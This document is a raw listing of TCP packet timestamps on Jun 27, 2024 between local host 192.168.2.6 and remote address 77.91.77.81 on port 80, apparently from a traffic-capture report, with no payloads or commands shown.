                                                                Jun 27, 2024 05:59:05.667954922 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667964935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.667979956 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.667988062 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668001890 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668013096 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668035030 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668067932 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668561935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668575048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668589115 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668602943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668612003 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668625116 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668637991 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668646097 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668658972 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668668032 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668680906 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668697119 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668704033 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668716908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668726921 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668737888 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668752909 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.668761969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.668795109 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.683835983 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.683860064 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.683872938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.683922052 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.683950901 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.683975935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.683990002 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.684004068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.684015989 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.684027910 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.684039116 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.684072971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.684123993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.684165955 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747340918 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747369051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747383118 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747428894 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747472048 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747545004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747566938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747586012 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747592926 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747613907 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747621059 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747632027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747646093 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747657061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747665882 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747689009 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747703075 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747713089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747735023 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747749090 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747759104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747777939 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747792006 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747885942 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747900009 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747914076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747922897 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747934103 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.747941971 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747956038 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.747972965 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755304098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755357981 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755372047 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755398989 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755434036 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755497932 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755511999 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755546093 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755573034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755609989 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755631924 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755646944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755657911 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755670071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755680084 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755692959 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755702972 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755714893 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755724907 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755733967 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755760908 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755914927 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755934954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755949974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.755959988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.755980015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756000042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756072044 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756086111 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756100893 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756118059 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756129026 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756136894 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756165028 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756206989 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756254911 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756325960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756340981 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756354094 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756367922 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756376982 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756391048 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756397963 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756412029 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756422997 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756434917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756443977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756459951 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756467104 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756479025 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756495953 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756702900 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756717920 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756731987 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756746054 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756767988 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756779909 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756911993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756926060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756938934 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756956100 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756963015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756975889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.756984949 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.756997108 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757010937 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757020950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757040977 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757066011 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757265091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757277966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757301092 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757309914 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757323027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757330894 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757339954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757354021 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757366896 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757379055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757389069 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757415056 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757589102 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757601023 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757615089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757632971 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757639885 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757654905 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757683039 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757704020 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757719040 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757734060 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757747889 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757765055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757771969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757786036 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757795095 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757795095 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757813931 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757821083 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757833004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757846117 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757859945 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757859945 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757875919 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757885933 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757895947 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757910967 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.757924080 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.757987976 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758384943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758399010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758413076 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758430004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758444071 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758450985 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758464098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758476973 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758487940 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758502960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758510113 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758518934 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758531094 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758538961 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758552074 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758564949 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758588076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758820057 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758848906 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758863926 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758872986 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758888960 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758897066 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758908987 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758919001 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758928061 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758940935 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758959055 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.758965969 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758975029 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.758985996 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759000063 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759011030 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759025097 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759032965 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759041071 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759054899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759068966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759085894 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759093046 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759102106 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759123087 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759135962 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759167910 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759442091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759455919 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759469986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759484053 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759491920 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759500027 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759512901 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759533882 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759545088 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759555101 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759568930 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759583950 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759593010 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759605885 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759614944 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759630919 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759638071 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759649992 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759658098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759666920 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759677887 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759691954 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759701967 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759713888 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759722948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759736061 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759744883 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759762049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759768963 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759782076 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759789944 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.759803057 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.759825945 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.775249958 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775276899 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775290966 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775438070 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775453091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775465965 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775480986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.775511980 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.775527954 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.838659048 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838675022 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838690042 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838704109 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838718891 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838732004 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838747025 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838803053 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838825941 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838840008 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838855028 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838870049 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.838884115 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.839041948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.839066982 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.839082956 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.839122057 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.839148998 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846457005 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846513987 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846525908 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846540928 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846574068 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846590042 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846632957 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846647024 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846661091 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846678019 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.846684933 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846695900 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.846724987 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847290993 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847345114 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847368956 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847397089 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847413063 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847419977 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847435951 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847459078 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847496986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847538948 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847620010 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847634077 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847649097 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847661018 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847671986 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847681046 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847698927 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847706079 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847717047 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847734928 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847860098 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847875118 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.847906113 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.847918034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848007917 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848022938 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848036051 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848051071 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848058939 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848069906 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848083019 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848097086 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848105907 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848119974 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848129034 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848150015 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848164082 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848365068 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848377943 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848391056 CEST804972977.91.77.81192.168.2.6
                                                                Jun 27, 2024 05:59:05.848412037 CEST4972980192.168.2.677.91.77.81
                                                                Jun 27, 2024 05:59:05.848422050 CEST804972977.91.77.81192.168.2.6
